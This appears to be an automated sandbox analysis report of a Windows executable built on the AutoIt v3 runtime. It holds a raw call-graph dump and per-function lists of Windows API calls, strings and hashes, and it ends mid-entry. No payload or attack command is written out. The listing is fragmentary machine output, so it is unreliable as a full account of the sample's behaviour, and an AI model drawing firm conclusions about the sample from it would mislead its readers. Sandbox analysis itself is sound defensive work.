c28cf2 98962->98964 98965 c28cdd 98962->98965 98963 c28cab 98982 c1f2d9 20 API calls _abort 98963->98982 98970 c28d45 __fread_nolock 38 API calls 98964->98970 98983 c1f2d9 20 API calls _abort 98965->98983 98967 c28c53 __wsopen_s 98967->98936 98972 c28ced 98970->98972 98971 c28ce2 98984 c1f2c6 20 API calls _abort 98971->98984 98985 c28d1c LeaveCriticalSection __wsopen_s 98972->98985 98975->98928 98976->98939 98977->98931 98978->98962 98979->98951 98980->98967 98981->98963 98982->98959 98983->98971 98984->98972 98985->98967 98986->98955 98987->98959 98988->98967 98989 c103fb 98990 c10407 BuildCatchObjectHelperInternal 98989->98990 99018 c0feb1 98990->99018 98992 c1040e 98993 c10561 98992->98993 98996 c10438 98992->98996 99045 c1083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98993->99045 98995 c10568 99046 c14e52 28 API calls _abort 98995->99046 99006 c10477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98996->99006 99029 c2247d 98996->99029 98998 c1056e 99047 c14e04 28 API calls _abort 98998->99047 99002 c10576 99003 c10457 99009 c104d8 99006->99009 99041 c14e1a 38 API calls 2 library calls 99006->99041 99007 c104de 99010 c104f3 99007->99010 99037 c10959 99009->99037 99042 c10992 GetModuleHandleW 99010->99042 99012 c104fa 99012->98995 99013 c104fe 99012->99013 99014 c10507 99013->99014 99043 c14df5 28 API calls _abort 99013->99043 99044 c10040 13 API calls 2 library calls 99014->99044 99017 c1050f 99017->99003 99019 c0feba 99018->99019 99048 c10698 IsProcessorFeaturePresent 99019->99048 99021 c0fec6 99049 c12c94 10 API calls 3 library calls 99021->99049 99023 c0fecb 99024 c0fecf 99023->99024 99050 c22317 99023->99050 99024->98992 99027 c0fee6 99027->98992 99030 c22494 99029->99030 99031 c10a8c _ValidateLocalCookies 5 API calls 99030->99031 99032 c10451 99031->99032 99032->99003 99033 c22421 99032->99033 99034 c22450 99033->99034 99035 c10a8c _ValidateLocalCookies 5 API calls 99034->99035 99036 c22479 99035->99036 99036->99006 99101 c12340 99037->99101 99040 c1097f 99040->99007 99041->99009 99042->99012 99043->99014 99044->99017 99045->98995 99046->98998 99047->99002 99048->99021 99049->99023 99054 c2d1f6 99050->99054 99053 c12cbd 8 API calls 3 library calls 99053->99024 99057 c2d213 99054->99057 99058 c2d20f 99054->99058 99056 c0fed8 99056->99027 99056->99053 99057->99058 99060 c24bfb 99057->99060 99072 c10a8c 99058->99072 99061 c24c07 BuildCatchObjectHelperInternal 99060->99061 99079 c22f5e EnterCriticalSection 99061->99079 99063 c24c0e 99080 c250af 99063->99080 99065 c24c1d 99066 c24c2c 99065->99066 99093 c24a8f 29 API calls 99065->99093 99095 c24c48 LeaveCriticalSection _abort 99066->99095 99069 c24c27 99094 c24b45 GetStdHandle GetFileType 99069->99094 99070 c24c3d __wsopen_s 99070->99057 99073 c10a95 99072->99073 99074 c10a97 IsProcessorFeaturePresent 99072->99074 99073->99056 99076 c10c5d 99074->99076 99100 c10c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99076->99100 99078 c10d40 99078->99056 99079->99063 99081 c250bb BuildCatchObjectHelperInternal 99080->99081 99082 c250c8 99081->99082 99083 c250df 99081->99083 99097 c1f2d9 20 API calls _abort 99082->99097 99096 c22f5e EnterCriticalSection 99083->99096 99086 c250eb 99091 c25000 __wsopen_s 21 API calls 99086->99091 99092 c25117 99086->99092 99087 c250cd 99098 c227ec 26 API calls pre_c_initialization 99087->99098 99090 c250d7 __wsopen_s 99090->99065 99091->99086 99099 c2513e LeaveCriticalSection _abort 99092->99099 99093->99069 99094->99066 99095->99070 99096->99086 99097->99087 99098->99090 99099->99090 99100->99078 99102 c1096c GetStartupInfoW 99101->99102 99102->99040 99103 bf1044 99108 bf10f3 99103->99108 99105 bf104a 99144 c100a3 29 API calls __onexit 99105->99144 99107 bf1054 99145 bf1398 99108->99145 99112 bf116a 99113 bfa961 22 API calls 99112->99113 99114 bf1174 99113->99114 99115 bfa961 22 API calls 99114->99115 99116 bf117e 99115->99116 99117 bfa961 22 API calls 99116->99117 99118 bf1188 99117->99118 99119 bfa961 22 API calls 99118->99119 99120 bf11c6 99119->99120 99121 bfa961 22 API calls 99120->99121 99122 bf1292 99121->99122 99155 bf171c 99122->99155 99126 bf12c4 99127 bfa961 22 API calls 99126->99127 99128 bf12ce 99127->99128 99129 c01940 9 API calls 99128->99129 99130 bf12f9 99129->99130 99176 bf1aab 99130->99176 99132 bf1315 99133 bf1325 GetStdHandle 99132->99133 99134 bf137a 99133->99134 99135 c32485 99133->99135 99139 bf1387 OleInitialize 99134->99139 99135->99134 99136 c3248e 99135->99136 99137 c0fddb 22 API calls 99136->99137 99138 c32495 99137->99138 99183 c6011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99138->99183 99139->99105 99141 c3249e 99184 c60944 CreateThread 99141->99184 99143 c324aa CloseHandle 99143->99134 99144->99107 99185 bf13f1 99145->99185 99148 bf13f1 22 API calls 99149 bf13d0 99148->99149 99150 bfa961 22 API calls 99149->99150 99151 bf13dc 99150->99151 99152 bf6b57 22 API calls 99151->99152 99153 bf1129 99152->99153 99154 bf1bc3 6 API calls 99153->99154 99154->99112 99156 bfa961 22 API calls 99155->99156 99157 bf172c 99156->99157 99158 bfa961 22 API calls 99157->99158 99159 bf1734 99158->99159 99160 bfa961 22 API calls 99159->99160 99161 bf174f 99160->99161 99162 c0fddb 22 API calls 99161->99162 99163 bf129c 99162->99163 99164 bf1b4a 99163->99164 99165 bf1b58 99164->99165 99166 bfa961 22 API calls 99165->99166 99167 bf1b63 99166->99167 99168 bfa961 22 API calls 99167->99168 99169 bf1b6e 99168->99169 99170 bfa961 22 API calls 99169->99170 99171 bf1b79 99170->99171 99172 bfa961 22 API calls 99171->99172 99173 bf1b84 99172->99173 99174 c0fddb 22 API calls 99173->99174 99175 bf1b96 RegisterWindowMessageW 99174->99175 99175->99126 99177 bf1abb 99176->99177 99178 c3272d 99176->99178 99180 c0fddb 22 API calls 99177->99180 99192 c63209 23 API calls 99178->99192 99182 bf1ac3 99180->99182 99181 c32738 99182->99132 99183->99141 99184->99143 99193 c6092a 28 API calls 99184->99193 99186 bfa961 22 API calls 99185->99186 99187 bf13fc 99186->99187 99188 bfa961 22 API calls 99187->99188 99189 bf1404 99188->99189 99190 bfa961 22 API calls 99189->99190 99191 bf13c6 99190->99191 99191->99148 99192->99181 99194 bf2de3 99195 bf2df0 __wsopen_s 99194->99195 99196 bf2e09 99195->99196 99197 c32c2b ___scrt_fastfail 99195->99197 99198 bf3aa2 23 API calls 99196->99198 99199 c32c47 GetOpenFileNameW 99197->99199 99200 bf2e12 99198->99200 99201 c32c96 99199->99201 99210 bf2da5 99200->99210 99203 bf6b57 22 API calls 99201->99203 99205 c32cab 99203->99205 99205->99205 99207 bf2e27 99228 bf44a8 99207->99228 99211 c31f50 __wsopen_s 99210->99211 99212 bf2db2 GetLongPathNameW 99211->99212 99213 bf6b57 22 API calls 99212->99213 99214 bf2dda 99213->99214 99215 bf3598 99214->99215 99216 bfa961 22 API calls 99215->99216 99217 bf35aa 99216->99217 99218 bf3aa2 23 API calls 99217->99218 99219 bf35b5 99218->99219 99220 c332eb 99219->99220 99221 bf35c0 99219->99221 99226 c3330d 99220->99226 99263 c0ce60 41 API calls 99220->99263 99223 bf515f 22 API calls 99221->99223 99224 bf35cc 99223->99224 99257 bf35f3 99224->99257 99227 bf35df 99227->99207 99229 bf4ecb 94 API calls 99228->99229 99230 bf44cd 99229->99230 99231 c33833 99230->99231 99233 bf4ecb 94 API calls 99230->99233 99232 c62cf9 80 API calls 99231->99232 99234 c33848 99232->99234 99235 bf44e1 99233->99235 99236 c33869 99234->99236 99237 c3384c 99234->99237 99235->99231 99238 bf44e9 99235->99238 99240 c0fe0b 22 API calls 99236->99240 99239 bf4f39 68 API calls 99237->99239 99241 c33854 99238->99241 99242 bf44f5 99238->99242 99239->99241 99248 c338ae 99240->99248 99265 c5da5a 82 API calls 99241->99265 99264 bf940c 136 API calls 2 library calls 99242->99264 99245 bf2e31 99246 c33862 99246->99236 99247 bf4f39 68 API calls 99251 c33a5f 99247->99251 99248->99251 99254 bf9cb3 22 API calls 99248->99254 99266 c5967e 22 API calls __fread_nolock 99248->99266 99267 c595ad 42 API calls _wcslen 99248->99267 99268 c60b5a 22 API calls 99248->99268 99269 bfa4a1 22 API calls __fread_nolock 99248->99269 99270 bf3ff7 22 API calls 99248->99270 99251->99247 99271 c5989b 82 API calls __wsopen_s 99251->99271 99254->99248 99258 bf3605 99257->99258 99262 bf3624 __fread_nolock 99257->99262 99260 c0fe0b 22 API calls 99258->99260 99259 c0fddb 22 API calls 99261 bf363b 99259->99261 99260->99262 99261->99227 99262->99259 99263->99220 99264->99245 99265->99246 99266->99248 99267->99248 99268->99248 99269->99248 99270->99248 99271->99251

                                        Executed Functions

                                        Function 00BF42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 234 bf42de-bf434d call bfa961 GetVersionExW call bf6b57 239 c33617-c3362a 234->239 240 bf4353 234->240 242 c3362b-c3362f 239->242 241 bf4355-bf4357 240->241 243 bf435d-bf43bc call bf93b2 call bf37a0 241->243 244 c33656 241->244 245 c33632-c3363e 242->245 246 c33631 242->246 263 c337df-c337e6 243->263 264 bf43c2-bf43c4 243->264 250 c3365d-c33660 244->250 245->242 247 c33640-c33642 245->247 246->245 247->241 249 c33648-c3364f 247->249 249->239 252 c33651 249->252 253 bf441b-bf4435 GetCurrentProcess IsWow64Process 250->253 254 c33666-c336a8 250->254 252->244 256 bf4437 253->256 257 bf4494-bf449a 253->257 254->253 258 c336ae-c336b1 254->258 260 bf443d-bf4449 256->260 257->260 261 c336b3-c336bd 258->261 262 c336db-c336e5 258->262 265 bf444f-bf445e LoadLibraryA 260->265 266 c33824-c33828 GetSystemInfo 260->266 267 c336ca-c336d6 261->267 268 c336bf-c336c5 261->268 270 c336e7-c336f3 262->270 271 c336f8-c33702 262->271 272 c33806-c33809 263->272 273 c337e8 263->273 264->250 269 bf43ca-bf43dd 264->269 278 bf449c-bf44a6 GetSystemInfo 265->278 279 bf4460-bf446e GetProcAddress 265->279 267->253 268->253 280 c33726-c3372f 269->280 281 bf43e3-bf43e5 269->281 270->253 274 c33715-c33721 271->274 275 c33704-c33710 271->275 276 c337f4-c337fc 272->276 277 c3380b-c3381a 272->277 282 c337ee 273->282 274->253 275->253 276->272 277->282 285 c3381c-c33822 277->285 287 bf4476-bf4478 278->287 279->278 286 bf4470-bf4474 GetNativeSystemInfo 279->286 283 c33731-c33737 280->283 284 c3373c-c33748 280->284 288 bf43eb-bf43ee 281->288 289 c3374d-c33762 281->289 282->276 283->253 284->253 285->276 286->287 294 bf447a-bf447b FreeLibrary 287->294 295 bf4481-bf4493 287->295 290 c33791-c33794 288->290 291 bf43f4-bf440f 288->291 292 c33764-c3376a 289->292 293 c3376f-c3377b 289->293 290->253 298 c3379a-c337c1 290->298 296 c33780-c3378c 291->296 297 bf4415 291->297 292->253 293->253 294->295 296->253 297->253 299 c337c3-c337c9 298->299 300 c337ce-c337da 298->300 299->253 300->253
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 00BF430D
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • GetCurrentProcess.KERNEL32(?,00C8CB64,00000000,?,?), ref: 00BF4422
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BF4429
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BF4454
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BF4466
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BF4474
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BF447B
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 00BF44A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: ebb55a0ff357ae16b54a27738759c2583b2225a1ae51d599ea3c9b82987e953e
                                        • Instruction ID: 05f0947f3f8affe265196a1c76b486d7a41a36274e1664b403a0d1b641533710
                                        • Opcode Fuzzy Hash: ebb55a0ff357ae16b54a27738759c2583b2225a1ae51d599ea3c9b82987e953e
                                        • Instruction Fuzzy Hash: 48A1A075D2A2C4CFC712D76AFC85BAD3EE46B67308B0C55E9E841A3B33D6204648CB25
                                        Function 00BF42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 637 bf42a2-bf42ba CreateStreamOnHGlobal 638 bf42bc-bf42d3 FindResourceExW 637->638 639 bf42da-bf42dd 637->639 640 bf42d9 638->640 641 c335ba-c335c9 LoadResource 638->641 640->639 641->640 642 c335cf-c335dd SizeofResource 641->642 642->640 643 c335e3-c335ee LockResource 642->643 643->640 644 c335f4-c335fc 643->644 645 c33600-c33612 644->645 645->640
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BF50AA,?,?,00000000,00000000), ref: 00BF42B2
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BF50AA,?,?,00000000,00000000), ref: 00BF42C9
                                        • LoadResource.KERNEL32(?,00000000,?,?,00BF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BF4F20), ref: 00C335BE
                                        • SizeofResource.KERNEL32(?,00000000,?,?,00BF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BF4F20), ref: 00C335D3
                                        • LockResource.KERNEL32(00BF50AA,?,?,00BF50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BF4F20,?), ref: 00C335E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: b5da55b407fe8571634e629130acafbceab7beb6046e41ffa0fabd5bf75b7abd
                                        • Instruction ID: 96a2af4f9af52f1d7bd9ec0b84a79638bb040f0d74332093b6f20099e7ef94ac
                                        • Opcode Fuzzy Hash: b5da55b407fe8571634e629130acafbceab7beb6046e41ffa0fabd5bf75b7abd
                                        • Instruction Fuzzy Hash: 46117C70200704BFDB258B65DC88F2B7BB9EBC5B51F1081A9B512976A0DB71DC088730
                                        Function 00C32BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF2B6B
                                          • Part of subcall function 00BF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CC1418,?,00BF2E7F,?,?,?,00000000), ref: 00BF3A78
                                          • Part of subcall function 00BF9CB3: _wcslen.LIBCMT ref: 00BF9CBD
                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00CB2224), ref: 00C32C10
                                        • ShellExecuteW.SHELL32(00000000,?,?,00CB2224), ref: 00C32C17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                        • String ID: runas
                                        • API String ID: 448630720-4000483414
                                        • Opcode ID: e0511bc17311fb1f459ca6c851c92a4d33289dded36af758532abad7f45c2c22
                                        • Instruction ID: 1b802f36cf102e2e98a924b4ee7a621ef4d4134894920b16ca5b215ab95e0c79
                                        • Opcode Fuzzy Hash: e0511bc17311fb1f459ca6c851c92a4d33289dded36af758532abad7f45c2c22
                                        • Instruction Fuzzy Hash: 0611A2311083496ACB15FF60D892FBEB7E4DB91751F4814ADF742530A3CF218A4E8712
                                        Function 00C5DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,00C35222), ref: 00C5DBCE
                                        • GetFileAttributesW.KERNELBASE(?), ref: 00C5DBDD
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00C5DBEE
                                        • FindClose.KERNEL32(00000000), ref: 00C5DBFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 9fe7eaba14d7faa6299e1552e26a131ddb56ead0979b3eebf73226abf3f9d3c4
                                        • Instruction ID: 4a124f0e6c463a962353ef0947c314a74002b1599d71cdd4711647cb2e681aef
                                        • Opcode Fuzzy Hash: 9fe7eaba14d7faa6299e1552e26a131ddb56ead0979b3eebf73226abf3f9d3c4
                                        • Instruction Fuzzy Hash: 9BF0A7304106105783306B78AC4D66E376C9E01335B104702F836C10F0EBB0699886AD
                                        Function 00BFD730 Relevance: 21.6, APIs: 14, Instructions: 621windowsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 00BFD807
                                        • timeGetTime.WINMM ref: 00BFDA07
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFDB28
                                        • TranslateMessage.USER32(?), ref: 00BFDB7B
                                        • DispatchMessageW.USER32(?), ref: 00BFDB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BFDB9F
                                        • Sleep.KERNEL32(0000000A), ref: 00BFDBB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                        • String ID:
                                        • API String ID: 2189390790-0
                                        • Opcode ID: 8af8fc2e89c131e6f01024b011d3e1cf65938a8ffb87cd6c009f0e291f332175
                                        • Instruction ID: 6467d3875c7c8b9ecdd60d8f4787a54b423535427666bc3705eb5c14f7605e34
                                        • Opcode Fuzzy Hash: 8af8fc2e89c131e6f01024b011d3e1cf65938a8ffb87cd6c009f0e291f332175
                                        • Instruction Fuzzy Hash: 0242E130608346DFD724CF24C885B7ABBE2FF45304F548699FAA587291D770E988DB92
                                        Function 00BF2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00BF2D07
                                        • RegisterClassExW.USER32(00000030), ref: 00BF2D31
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF2D42
                                        • InitCommonControlsEx.COMCTL32(?), ref: 00BF2D5F
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF2D6F
                                        • LoadIconW.USER32(000000A9), ref: 00BF2D85
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF2D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                        • API String ID: 2914291525-1005189915
                                        • Opcode ID: c4b9507fde8ff666beb8b9ea42f8bef3dd20a9be22e4d0865d5fdb35d3701c4f
                                        • Instruction ID: bbd10243a51149b34668822ef4f549c41a4804d60f251bc75b93f63fa23731f1
                                        • Opcode Fuzzy Hash: c4b9507fde8ff666beb8b9ea42f8bef3dd20a9be22e4d0865d5fdb35d3701c4f
                                        • Instruction Fuzzy Hash: D121F2B1901318AFDB00DFA5EC89BDDBBB4FB09704F04811AFA11A62A0D7B14540CFA5
                                        Function 00C3065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 302 c3065b-c3068b call c3042f 305 c306a6-c306b2 call c25221 302->305 306 c3068d-c30698 call c1f2c6 302->306 311 c306b4-c306c9 call c1f2c6 call c1f2d9 305->311 312 c306cb-c30714 call c3039a 305->312 313 c3069a-c306a1 call c1f2d9 306->313 311->313 322 c30781-c3078a GetFileType 312->322 323 c30716-c3071f 312->323 320 c3097d-c30983 313->320 324 c307d3-c307d6 322->324 325 c3078c-c307bd GetLastError call c1f2a3 CloseHandle 322->325 327 c30721-c30725 323->327 328 c30756-c3077c GetLastError call c1f2a3 323->328 331 c307d8-c307dd 324->331 332 c307df-c307e5 324->332 325->313 341 c307c3-c307ce call c1f2d9 325->341 327->328 333 c30727-c30754 call c3039a 327->333 328->313 336 c307e9-c30837 call c2516a 331->336 332->336 337 c307e7 332->337 333->322 333->328 344 c30847-c3086b call c3014d 336->344 345 c30839-c30845 call c305ab 336->345 337->336 341->313 352 c3087e-c308c1 344->352 353 c3086d 344->353 345->344 351 c3086f-c30879 call c286ae 345->351 351->320 355 c308c3-c308c7 352->355 356 c308e2-c308f0 352->356 353->351 355->356 360 c308c9-c308dd 355->360 357 c308f6-c308fa 356->357 358 c3097b 356->358 357->358 361 c308fc-c3092f CloseHandle call c3039a 357->361 358->320 360->356 364 c30963-c30977 361->364 365 c30931-c3095d GetLastError call c1f2a3 call c25333 361->365 364->358 365->364
                                        APIs
                                          • Part of subcall function 00C3039A: CreateFileW.KERNELBASE(00000000,00000000,?,00C30704,?,?,00000000,?,00C30704,00000000,0000000C), ref: 00C303B7
                                        • GetLastError.KERNEL32 ref: 00C3076F
                                        • __dosmaperr.LIBCMT ref: 00C30776
                                        • GetFileType.KERNELBASE(00000000), ref: 00C30782
                                        • GetLastError.KERNEL32 ref: 00C3078C
                                        • __dosmaperr.LIBCMT ref: 00C30795
                                        • CloseHandle.KERNEL32(00000000), ref: 00C307B5
                                        • CloseHandle.KERNEL32(?), ref: 00C308FF
                                        • GetLastError.KERNEL32 ref: 00C30931
                                        • __dosmaperr.LIBCMT ref: 00C30938
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: 3f04b126c8ec4ee193204fabe3a15e8ebdf27d09f9277a814eace0272a5c5627
                                        • Instruction ID: 704c86bc0197eca6115dc6e8eb220815539cab08ab122211fe683450d9fda1b4
                                        • Opcode Fuzzy Hash: 3f04b126c8ec4ee193204fabe3a15e8ebdf27d09f9277a814eace0272a5c5627
                                        • Instruction Fuzzy Hash: BBA1F633A141188FDF19AF68D862BAE7BA0AB46320F24015DF8259B2E1D7319D53DB91
                                        Function 00BF344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00BF3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00CC1418,?,00BF2E7F,?,?,?,00000000), ref: 00BF3A78
                                          • Part of subcall function 00BF3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BF3379
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BF356A
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C3318D
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C331CE
                                        • RegCloseKey.ADVAPI32(?), ref: 00C33210
                                        • _wcslen.LIBCMT ref: 00C33277
                                        • _wcslen.LIBCMT ref: 00C33286
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
